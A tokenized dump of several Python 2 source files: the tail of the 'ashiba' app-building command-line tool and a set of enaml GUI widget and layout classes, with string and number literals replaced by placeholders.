<EOL> def clean_app_dir ( path ) : <EOL> for app_dir in [ os . path . join ( path , d ) for d in [ '<STR_LIT>' , '<STR_LIT>' ] ] : <EOL> if os . path . isdir ( app_dir ) : <EOL> print "<STR_LIT>" . format ( app_dir ) <EOL> shutil . rmtree ( app_dir ) <EOL> modified = os . path . join ( path , '<STR_LIT>' ) <EOL> if os . path . isfile ( modified ) : <EOL> os . remove ( modified ) <EOL> for root , dirs , files in os . walk ( path ) : <EOL> for fname in files : <EOL> if fname . endswith ( '<STR_LIT>' ) : <EOL> os . remove ( os . path . join ( root , fname ) ) <EOL> def compile_check ( args ) : <EOL> path = args . path <EOL> app_path = os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> mtimes = get_mtimes ( path ) <EOL> mtime_fname = os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> try : <EOL> old_mtimes = json . load ( open ( mtime_fname ) ) <EOL> except ( IOError , ValueError ) : <EOL> old_mtimes = { } <EOL> if ( not os . path . isdir ( app_path ) <EOL> or mtimes != old_mtimes <EOL> or vars ( args ) . get ( '<STR_LIT>' ) ) : <EOL> print "<STR_LIT>" <EOL> _compile ( args ) <EOL> mtimes = get_mtimes ( path ) <EOL> with closing ( open ( mtime_fname , '<STR_LIT:w>' ) ) as mtime_file : <EOL> json . dump ( mtimes , mtime_file ) <EOL> def _start ( args ) : <EOL> path = args . path <EOL> app_path = os . path . abspath ( os . path . join ( path , '<STR_LIT>' ) ) <EOL> compile_check ( args ) <EOL> print "<STR_LIT>" , app_path <EOL> sys . path . insert ( <NUM_LIT:0> , app_path ) <EOL> os . chdir ( app_path ) <EOL> initial_port = args . port <EOL> host , port = '<STR_LIT:localhost>' , ashiba . utils . get_port ( '<STR_LIT:localhost>' , initial_port ) <EOL> if vars ( args ) . get ( '<STR_LIT>' ) : <EOL> url = "<STR_LIT>" . format ( host , port ) <EOL> webbrowser . open_new ( url ) <EOL> import flask_loader <EOL> flask_loader . app . run ( host = host , port = port , <EOL> debug = True , <EOL> threaded = True , <EOL> use_reloader = False , ) <EOL> @ stay_put <EOL> def compile_enaml ( fpath ) : <EOL> print "<STR_LIT>" , fpath <EOL> abspath = os . path . abspath ( fpath ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> path , fname = os . path . split ( abspath ) <EOL> shutil . copy ( abspath , fname ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import enaml_loader <EOL> enaml_loader . main ( ) <EOL> root , ext = os . path . splitext ( fname ) <EOL> out_file = open ( os . path . join ( '<STR_LIT>' , root + '<STR_LIT>' ) , '<STR_LIT:w>' ) <EOL> out_file . write ( templatify_html ( open ( root + '<STR_LIT>' ) ) ) <EOL> out_file . close ( ) <EOL> def _qt ( args ) : <EOL> compile_check ( args ) <EOL> initial_port = args . port <EOL> port = ashiba . utils . get_port ( '<STR_LIT:localhost>' , initial_port ) <EOL> server_args = copy . deepcopy ( args ) <EOL> server_args . port = port <EOL> server = mp . Process ( target = _start , args = ( server_args , ) ) <EOL> server . start ( ) <EOL> url = '<STR_LIT>' . format ( port ) <EOL> with stay ( ) : <EOL> os . chdir ( os . path . join ( args . path , '<STR_LIT>' ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import settings <EOL> if '<STR_LIT>' in vars ( settings ) : <EOL> icon = os . path . abspath ( settings . QT_ICON ) <EOL> elif '<STR_LIT>' in vars ( settings ) : <EOL> icon = os . path . abspath ( settings . APP_ICON ) <EOL> else : <EOL> icon = '<STR_LIT>' <EOL> if '<STR_LIT>' in vars ( settings ) : <EOL> name = settings . APP_NAME <EOL> else : <EOL> name = os . path . split ( args . path ) [ - <NUM_LIT:1> ] <EOL> name = "<STR_LIT>" + name <EOL> browser = mp . Process ( target = browse , args = ( url , name , icon ) ) <EOL> browser . start ( ) <EOL> browser . join ( ) <EOL> print "<STR_LIT>" <EOL> server . terminate ( ) <EOL> sys . exit ( ) <EOL> def browse ( url , name = '<STR_LIT>' , icon = '<STR_LIT>' ) : <EOL> from PySide . QtGui import QApplication , QIcon <EOL> from PySide . QtCore import QUrl <EOL> from PySide . QtWebKit import QWebView <EOL> for try_ in range ( <NUM_LIT:10> ) : <EOL> try : <EOL> assert urllib2 . urlopen ( url ) . code == <NUM_LIT:200> <EOL> except ( AssertionError , urllib2 . URLError ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> else : <EOL> print "<STR_LIT>" % try_ <EOL> break <EOL> else : <EOL> sys . exit ( "<STR_LIT>" ) <EOL> qtapp = QApplication ( name ) <EOL> web = QWebView ( ) <EOL> web . load ( QUrl ( url ) ) <EOL> if icon : <EOL> print "<STR_LIT>" , icon <EOL> web . setWindowIcon ( QIcon ( icon ) ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> web . setWindowTitle ( name ) <EOL> web . show ( ) <EOL> qtapp . exec_ ( ) <EOL> @ stay_put <EOL> def _build ( args ) : <EOL> path = args . path <EOL> os . chdir ( path ) <EOL> if os . getcwd ( ) not in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , os . getcwd ( ) ) <EOL> import settings <EOL> SETTINGS = { k : v for k , v in vars ( settings ) . items ( ) if not k . startswith ( '<STR_LIT>' ) } <EOL> required_keys = [ '<STR_LIT>' ] <EOL> if len ( set ( required_keys ) - set ( SETTINGS . keys ( ) ) ) : <EOL> error_str = "<STR_LIT>" <EOL> for key in set ( required_keys ) - set ( SETTINGS . keys ( ) ) : <EOL> error_str += "<STR_LIT>" + key <EOL> sys . exit ( error_str ) <EOL> app_head = os . path . split ( os . getcwd ( ) ) [ - <NUM_LIT:1> ] <EOL> meta = { } <EOL> meta [ '<STR_LIT>' ] = { '<STR_LIT:name>' : app_head , <EOL> '<STR_LIT:version>' : <NUM_LIT:0.0> , <EOL> } <EOL> meta [ '<STR_LIT>' ] = { } <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> meta [ '<STR_LIT>' ] = { '<STR_LIT>' : "<STR_LIT>" . format ( app_head ) , <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> } <EOL> if '<STR_LIT>' in SETTINGS : <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = os . path . join ( '<STR_LIT:..>' , '<STR_LIT:src>' , <EOL> app_head , SETTINGS [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in SETTINGS : <EOL> meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = SETTINGS [ '<STR_LIT>' ] <EOL> binstar_path = SETTINGS . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> meta [ '<STR_LIT>' ] = { '<STR_LIT>' : '<STR_LIT>' + binstar_path , <EOL> '<STR_LIT>' : SETTINGS . get ( '<STR_LIT>' ) <EOL> } <EOL> build_dir = os . path . abspath ( '<STR_LIT>' ) <EOL> if os . path . isdir ( build_dir ) : <EOL> print "<STR_LIT>" . format ( build_dir ) <EOL> shutil . rmtree ( build_dir ) <EOL> source_dir = os . path . join ( '<STR_LIT>' , '<STR_LIT:src>' , app_head ) <EOL> temp_dir = os . path . join ( tempfile . mkdtemp ( ) , app_head ) <EOL> shutil . copytree ( os . getcwd ( ) , temp_dir ) <EOL> clean_app_dir ( temp_dir ) <EOL> shutil . copytree ( temp_dir , source_dir ) <EOL> os . mkdir ( os . path . join ( build_dir , '<STR_LIT>' ) ) <EOL> recipe_dir = os . path . join ( build_dir , '<STR_LIT>' ) <EOL> with closing ( open ( os . path . join ( recipe_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) ) as f_out : <EOL> f_out . write ( ashiba . utils . prettyaml ( meta ) ) <EOL> build_sh = """<STR_LIT>""" <EOL> with closing ( open ( os . path . join ( recipe_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) ) as f_out : <EOL> f_out . write ( build_sh ) <EOL> build_bat = """<STR_LIT>""" <EOL> with closing ( open ( os . path . join ( recipe_dir , '<STR_LIT>' ) , '<STR_LIT:w>' ) ) as f_out : <EOL> f_out . write ( build_bat ) <EOL> def _help ( args ) : <EOL> print "<STR_LIT>" <EOL> def main ( ) : <EOL> import argparse <EOL> if len ( sys . argv ) == <NUM_LIT:1> : <EOL> sys . argv . append ( '<STR_LIT>' ) <EOL> parser = argparse . ArgumentParser ( ) <EOL> subparsers = parser . add_subparsers ( ) <EOL> init = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> init . set_defaults ( func = _init ) <EOL> compile = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> compile . set_defaults ( func = _compile ) <EOL> start = subparsers . add_parser ( <EOL> "<STR_LIT:start>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> start . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = False , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> start . set_defaults ( func = _start ) <EOL> qt = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> qt . set_defaults ( func = _qt ) <EOL> build = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> build . set_defaults ( func = _build ) <EOL> clean = subparsers . add_parser ( <EOL> "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> clean . set_defaults ( func = _clean ) <EOL> for subparser in ( init , compile , start , qt , build ) : <EOL> subparser . add_argument ( '<STR_LIT:path>' , help = '<STR_LIT>' ) <EOL> clean . add_argument ( '<STR_LIT>' , nargs = '<STR_LIT:+>' , help = '<STR_LIT>' ) <EOL> port_kwargs = { <EOL> '<STR_LIT:action>' : '<STR_LIT:store>' , <EOL> '<STR_LIT:default>' : <NUM_LIT> , <EOL> '<STR_LIT:type>' : int , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> for subparser in ( start , qt ) : <EOL> subparser . add_argument ( '<STR_LIT>' , ** port_kwargs ) <EOL> subparser . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = False , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> args = parser . parse_args ( ) <EOL> args . func ( args ) </s>
<s> from atom . api import Unicode , Event <EOL> from . declarative_meta import DeclarativeMeta <EOL> from . object import Object , flag_generator , flag_property <EOL> def d_ ( member , readable = True , writable = True , final = True ) : <EOL> """<STR_LIT>""" <EOL> metadata = member . metadata <EOL> if metadata is None : <EOL> metadata = member . metadata = { } <EOL> metadata [ '<STR_LIT>' ] = True <EOL> metadata [ '<STR_LIT>' ] = readable <EOL> metadata [ '<STR_LIT>' ] = writable <EOL> metadata [ '<STR_LIT>' ] = final <EOL> return member <EOL> INITIALIZED_FLAG = flag_generator . next ( ) <EOL> class Declarative ( Object ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = DeclarativeMeta <EOL> name = d_ ( Unicode ( ) ) <EOL> initialized = d_ ( Event ( ) , writable = False ) <EOL> is_initialized = flag_property ( INITIALIZED_FLAG ) <EOL> def initialize ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in self . children [ : ] : <EOL> if isinstance ( child , Declarative ) : <EOL> child . initialize ( ) <EOL> self . is_initialized = True <EOL> self . initialized ( ) <EOL> def destroy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . is_initialized = False <EOL> for op in type ( self ) . __eval_operators__ . itervalues ( ) : <EOL> op . release ( self ) <EOL> for oplist in type ( self ) . __notify_operators__ . itervalues ( ) : <EOL> for op in oplist : <EOL> op . release ( self ) <EOL> super ( Declarative , self ) . destroy ( ) <EOL> def child_added ( self , child ) : <EOL> """<STR_LIT>""" <EOL> super ( Declarative , self ) . child_added ( child ) <EOL> if isinstance ( child , Declarative ) : <EOL> if self . is_initialized and not child . is_initialized : <EOL> child . initialize ( ) <EOL> def _run_eval_operator ( self , name ) : <EOL> """<STR_LIT>""" <EOL> op = type ( self ) . __eval_operators__ . get ( name ) <EOL> if op is not None : <EOL> return op . eval ( self ) <EOL> return NotImplemented <EOL> def _run_notify_operator ( self , change ) : <EOL> """<STR_LIT>""" <EOL> oplist = type ( self ) . __notify_operators__ . get ( change [ '<STR_LIT:name>' ] ) <EOL> if oplist is not None : <EOL> for op in oplist : <EOL> op . notify ( change ) </s>
<s> from casuarius import Solver , medium <EOL> class LayoutManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _solver = Solver ( autosolve = False ) <EOL> self . _initialized = False <EOL> self . _running = False <EOL> def initialize ( self , constraints ) : <EOL> """<STR_LIT>""" <EOL> if self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> solver = self . _solver <EOL> solver . autosolve = False <EOL> for cn in constraints : <EOL> solver . add_constraint ( cn ) <EOL> solver . autosolve = True <EOL> self . _initialized = True <EOL> def replace_constraints ( self , old_cns , new_cns ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> solver = self . _solver <EOL> solver . autosolve = False <EOL> for cn in old_cns : <EOL> solver . remove_constraint ( cn ) <EOL> for cn in new_cns : <EOL> solver . add_constraint ( cn ) <EOL> solver . autosolve = True <EOL> def layout ( self , cb , width , height , size , strength = medium , weight = <NUM_LIT:1.0> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if self . _running : <EOL> return <EOL> try : <EOL> self . _running = True <EOL> w , h = size <EOL> values = [ ( width , w ) , ( height , h ) ] <EOL> with self . _solver . suggest_values ( values , strength , weight ) : <EOL> cb ( ) <EOL> finally : <EOL> self . _running = False <EOL> def get_min_size ( self , width , height , strength = medium , weight = <NUM_LIT:0.1> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> values = [ ( width , <NUM_LIT:0.0> ) , ( height , <NUM_LIT:0.0> ) ] <EOL> with self . _solver . suggest_values ( values , strength , weight ) : <EOL> min_width = width . value <EOL> min_height = height . value <EOL> return ( min_width , min_height ) <EOL> def get_max_size ( self , width , height , strength = medium , weight = <NUM_LIT:0.1> ) : <EOL> """<STR_LIT>""" <EOL> if not self . _initialized : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> max_val = <NUM_LIT:2> ** <NUM_LIT> - <NUM_LIT:1> <EOL> values = [ ( width , max_val ) , ( height , max_val ) ] <EOL> with self . _solver . suggest_values ( values , strength , weight ) : <EOL> max_width = width . value <EOL> max_height = height . value <EOL> width_diff = abs ( max_val - int ( round ( max_width ) ) ) <EOL> height_diff = abs ( max_val - int ( round ( max_height ) ) ) <EOL> if width_diff <= <NUM_LIT:1> : <EOL> max_width = - <NUM_LIT:1> <EOL> if height_diff <= <NUM_LIT:1> : <EOL> max_height = - <NUM_LIT:1> <EOL> return ( max_width , max_height ) </s>
<s> from enaml . qt . QtGui import QSplitter , QSplitterHandle <EOL> from . q_dock_area import QDockArea <EOL> class QDockSplitterHandle ( QSplitterHandle ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class QDockSplitter ( QSplitter ) : <EOL> """<STR_LIT>""" <EOL> def createHandle ( self ) : <EOL> """<STR_LIT>""" <EOL> return QDockSplitterHandle ( self . orientation ( ) , self ) <EOL> def inheritOpaqueResize ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . parent ( ) <EOL> while p is not None : <EOL> if isinstance ( p , QDockArea ) : <EOL> self . setOpaqueResize ( p . opaqueItemResize ( ) ) <EOL> return <EOL> p = p . parent ( ) </s>
<s> from contextlib import contextmanager <EOL> from atom . api import List , Typed <EOL> from enaml . widgets . constraints_widget import ProxyConstraintsWidget <EOL> from . QtCore import QRect , QTimer <EOL> from . qt_widget import QtWidget <EOL> @ contextmanager <EOL> def size_hint_guard ( obj ) : <EOL> """<STR_LIT>""" <EOL> old_hint = obj . widget_item . sizeHint ( ) <EOL> yield <EOL> new_hint = obj . widget_item . sizeHint ( ) <EOL> if old_hint != new_hint : <EOL> obj . size_hint_updated ( ) <EOL> class QtConstraintsWidget ( QtWidget , ProxyConstraintsWidget ) : <EOL> """<STR_LIT>""" <EOL> size_hint_cns = List ( ) <EOL> layout_timer = Typed ( QTimer ) <EOL> def _default_size_hint_cns ( self ) : <EOL> """<STR_LIT>""" <EOL> cns = [ ] <EOL> hint = self . widget_item . sizeHint ( ) <EOL> if hint . isValid ( ) : <EOL> width_hint = hint . width ( ) <EOL> height_hint = hint . height ( ) <EOL> d = self . declaration <EOL> if width_hint >= <NUM_LIT:0> : <EOL> if d . hug_width != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . width == width_hint ) | d . hug_width ) <EOL> if d . resist_width != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . width >= width_hint ) | d . resist_width ) <EOL> if height_hint >= <NUM_LIT:0> : <EOL> if d . hug_height != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . height == height_hint ) | d . hug_height ) <EOL> if d . resist_height != '<STR_LIT:ignore>' : <EOL> cns . append ( ( d . height >= height_hint ) | d . resist_height ) <EOL> return cns <EOL> def request_relayout ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . layout_timer : <EOL> self . widget . setUpdatesEnabled ( False ) <EOL> self . layout_timer = timer = QTimer ( ) <EOL> timer . setSingleShot ( True ) <EOL> timer . timeout . connect ( self . on_layout_triggered ) <EOL> self . layout_timer . start ( ) <EOL> def on_layout_triggered ( self ) : <EOL> """<STR_LIT>""" <EOL> del self . layout_timer <EOL> self . relayout ( ) <EOL> self . widget . setUpdatesEnabled ( True ) <EOL> def relayout ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . parent ( ) <EOL> if isinstance ( parent , QtConstraintsWidget ) : <EOL> parent . relayout ( ) <EOL> def replace_constraints ( self , old_cns , new_cns ) : <EOL> """<STR_LIT>""" <EOL> parent = self . parent ( ) <EOL> if isinstance ( parent , QtConstraintsWidget ) : <EOL> parent . replace_constraints ( old_cns , new_cns ) <EOL> def size_hint_updated ( self ) : <EOL> """<STR_LIT>""" <EOL> parent = self . parent ( ) <EOL> if isinstance ( parent , QtConstraintsWidget ) : <EOL> old_cns = self . size_hint_cns <EOL> del self . size_hint_cns <EOL> new_cns = self . size_hint_cns <EOL> parent . replace_constraints ( old_cns , new_cns ) <EOL> def geometry_updater ( self ) : <EOL> """<STR_LIT>""" <EOL> d = self . declaration <EOL> x = d . left <EOL> y = d . top <EOL> width = d . width <EOL> height = d . height <EOL> setgeo = self . widget_item . setGeometry <EOL> rect = QRect <EOL> def update_geometry ( dx , dy ) : <EOL> nx = x . value <EOL> ny = y . value <EOL> setgeo ( rect ( nx - dx , ny - dy , width . value , height . value ) ) <EOL> return nx , ny <EOL> update_geometry . item = self <EOL> return update_geometry </s>
<s> from atom . api import Int , Typed <EOL> from enaml . widgets . object_combo import ProxyObjectCombo <EOL> from . QtCore import QTimer <EOL> from . QtGui import QComboBox <EOL> from . q_resource_helpers import get_cached_qicon <EOL> from . qt_control import QtControl <EOL> SELECTED_GUARD = <NUM_LIT> <EOL> class ComboRefreshTimer ( QTimer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , owner ) : <EOL> """<STR_LIT>""" <EOL> super ( ComboRefreshTimer , self ) . __init__ ( ) <EOL> self . setSingleShot ( True ) <EOL> self . owner = owner <EOL> def timerEvent ( self , event ) : <EOL> """<STR_LIT>""" <EOL> super ( ComboRefreshTimer , self ) . timerEvent ( event ) <EOL> owner = self . owner <EOL> if owner is not None : <EOL> del owner . refresh_timer <EOL> self . owner = None <EOL> owner . refresh_items ( ) <EOL> class QtObjectCombo ( QtControl , ProxyObjectCombo ) : <EOL> """<STR_LIT>""" <EOL> widget = Typed ( QComboBox ) <EOL> refresh_timer = Typed ( ComboRefreshTimer ) <EOL> _guard = Int ( <NUM_LIT:0> ) <EOL> def _default_refresh_timer ( self ) : <EOL> """<STR_LIT>""" <EOL> return ComboRefreshTimer ( self ) <EOL> def create_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> self . widget = QComboBox ( self . parent_widget ( ) ) <EOL> self . widget . setInsertPolicy ( QComboBox . NoInsert ) <EOL> def init_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( QtObjectCombo , self ) . init_widget ( ) <EOL> self . refresh_items ( ) <EOL> self . widget . currentIndexChanged . connect ( self . on_index_changed ) <EOL> def on_index_changed ( self , index ) : <EOL> """<STR_LIT>""" <EOL> if not self . _guard & SELECTED_GUARD : <EOL> self . _guard |= SELECTED_GUARD <EOL> try : <EOL> item = self . declaration . items [ index ] <EOL> self . declaration . selected = item <EOL> finally : <EOL> self . _guard &= ~ SELECTED_GUARD <EOL> def refresh_items ( self ) : <EOL> """<STR_LIT>""" <EOL> d = self . declaration <EOL> selected = d . selected <EOL> to_string = d . to_string <EOL> to_icon = d . to_icon <EOL> widget = self . widget <EOL> self . _guard |= SELECTED_GUARD <EOL> try : <EOL> widget . clear ( ) <EOL> target_index = - <NUM_LIT:1> <EOL> for index , item in enumerate ( d . items ) : <EOL> text = to_string ( item ) <EOL> icon = to_icon ( item ) <EOL> if icon is None : <EOL> qicon = None <EOL> else : <EOL> qicon = get_cached_qicon ( icon ) <EOL> if qicon is None : <EOL> widget . addItem ( text ) <EOL> else : <EOL> widget . addItem ( qicon , text ) <EOL> if item == selected : <EOL> target_index = index <EOL> widget . setCurrentIndex ( target_index ) <EOL> finally : <EOL> self . _guard &= ~ SELECTED_GUARD <EOL> def set_selected ( self , selected ) : <EOL> """<STR_LIT>""" <EOL> if not self . _guard & SELECTED_GUARD : <EOL> self . _guard |= SELECTED_GUARD <EOL> try : <EOL> d = self . declaration <EOL> try : <EOL> index = d . items . index ( selected ) <EOL> except ValueError : <EOL> index = - <NUM_LIT:1> <EOL> self . widget . setCurrentIndex ( index ) <EOL> finally : <EOL> self . _guard &= ~ SELECTED_GUARD <EOL> def set_editable ( self , editable ) : <EOL> """<STR_LIT>""" <EOL> widget = self . widget <EOL> widget . setEditable ( editable ) <EOL> widget . update ( ) <EOL> def request_items_refresh ( self ) : <EOL> """<STR_LIT>""" <EOL> self . refresh_timer . start ( ) </s>
<s> from . mono_font import MONO_FONT <EOL> IDLE_THEME = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : MONO_FONT <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } <EOL> IDLE_THEME [ "<STR_LIT>" ] = IDLE_THEME [ "<STR_LIT>" ] </s>
<s> from atom . api import Typed , ForwardTyped , Unicode , Bool , Event , observe <EOL> from enaml . core . declarative import d_ <EOL> from enaml . icon import Icon <EOL> from . toolkit_object import ToolkitObject , ProxyToolkitObject <EOL> class ProxyAction ( ProxyToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : Action ) <EOL> def set_text ( self , text ) : <EOL> raise NotImplementedError <EOL> def set_tool_tip ( self , tool_tip ) : <EOL> raise NotImplementedError <EOL> def set_status_tip ( self , status_tip ) : <EOL> raise NotImplementedError <EOL> def set_icon ( self , icon ) : <EOL> raise NotImplementedError <EOL> def set_checkable ( self , checkable ) : <EOL> raise NotImplementedError <EOL> def set_checked ( self , checked ) : <EOL> raise NotImplementedError <EOL> def set_enabled ( self , enabled ) : <EOL> raise NotImplementedError <EOL> def set_visible ( self , visible ) : <EOL> raise NotImplementedError <EOL> def set_separator ( self , separator ) : <EOL> raise NotImplementedError <EOL> class Action ( ToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> text = d_ ( Unicode ( ) ) <EOL> tool_tip = d_ ( Unicode ( ) ) <EOL> status_tip = d_ ( Unicode ( ) ) <EOL> icon = d_ ( Typed ( Icon ) ) <EOL> checkable = d_ ( Bool ( False ) ) <EOL> checked = d_ ( Bool ( False ) ) <EOL> enabled = d_ ( Bool ( True ) ) <EOL> visible = d_ ( Bool ( True ) ) <EOL> separator = d_ ( Bool ( False ) ) <EOL> triggered = d_ ( Event ( bool ) , writable = False ) <EOL> toggled = d_ ( Event ( bool ) , writable = False ) <EOL> proxy = Typed ( ProxyAction ) <EOL> @ observe ( ( '<STR_LIT:text>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( Action , self ) . _update_proxy ( change ) </s>
<s> from atom . api import Unicode , Typed , ForwardTyped , observe , set_default <EOL> from enaml . core . declarative import d_ <EOL> from . control import Control , ProxyControl <EOL> class ProxyHtml ( ProxyControl ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : Html ) <EOL> def set_source ( self , source ) : <EOL> raise NotImplementedError <EOL> class Html ( Control ) : <EOL> """<STR_LIT>""" <EOL> source = d_ ( Unicode ( ) ) <EOL> hug_width = set_default ( '<STR_LIT:ignore>' ) <EOL> hug_height = set_default ( '<STR_LIT:ignore>' ) <EOL> proxy = Typed ( ProxyHtml ) <EOL> @ observe ( '<STR_LIT:source>' ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( Html , self ) . _update_proxy ( change ) </s>
<s> from atom . api import Typed , ForwardTyped , Enum , Range , observe <EOL> from enaml . core . declarative import d_ <EOL> from . toolkit_object import ToolkitObject , ProxyToolkitObject <EOL> from . widget import Widget <EOL> class ProxyStatusItem ( ProxyToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> declaration = ForwardTyped ( lambda : StatusItem ) <EOL> def set_mode ( eslf , mode ) : <EOL> raise NotImplementedError <EOL> def set_stretch ( self , stretch ) : <EOL> raise NotImplementedError <EOL> class StatusItem ( ToolkitObject ) : <EOL> """<STR_LIT>""" <EOL> mode = d_ ( Enum ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> stretch = d_ ( Range ( low = <NUM_LIT:0> ) ) <EOL> proxy = Typed ( ProxyStatusItem ) <EOL> def status_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> for child in reversed ( self . children ) : <EOL> if isinstance ( child , Widget ) : <EOL> return child <EOL> @ observe ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def _update_proxy ( self , change ) : <EOL> """<STR_LIT>""" <EOL> super ( StatusItem , self ) . _update_proxy ( change ) </s>
<s> import wx . html <EOL> from atom . api import Typed <EOL> from enaml . widgets . html import ProxyHtml <EOL> from . wx_control import WxControl <EOL> class wxProperHtmlWindow ( wx . html . HtmlWindow ) : <EOL> """<STR_LIT>""" <EOL> _best_size = wx . Size ( <NUM_LIT> , <NUM_LIT> ) <EOL> def GetBestSize ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _best_size <EOL> class WxHtml ( WxControl , ProxyHtml ) : <EOL> """<STR_LIT>""" <EOL> widget = Typed ( wxProperHtmlWindow ) <EOL> def create_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> self . widget = wxProperHtmlWindow ( self . parent_widget ( ) ) <EOL> def init_widget ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( WxHtml , self ) . init_widget ( ) <EOL> self . set_source ( self . declaration . source ) <EOL> def set_source ( self , source ) : <EOL> """<STR_LIT>""" <EOL> self . widget . SetPage ( source ) </s>
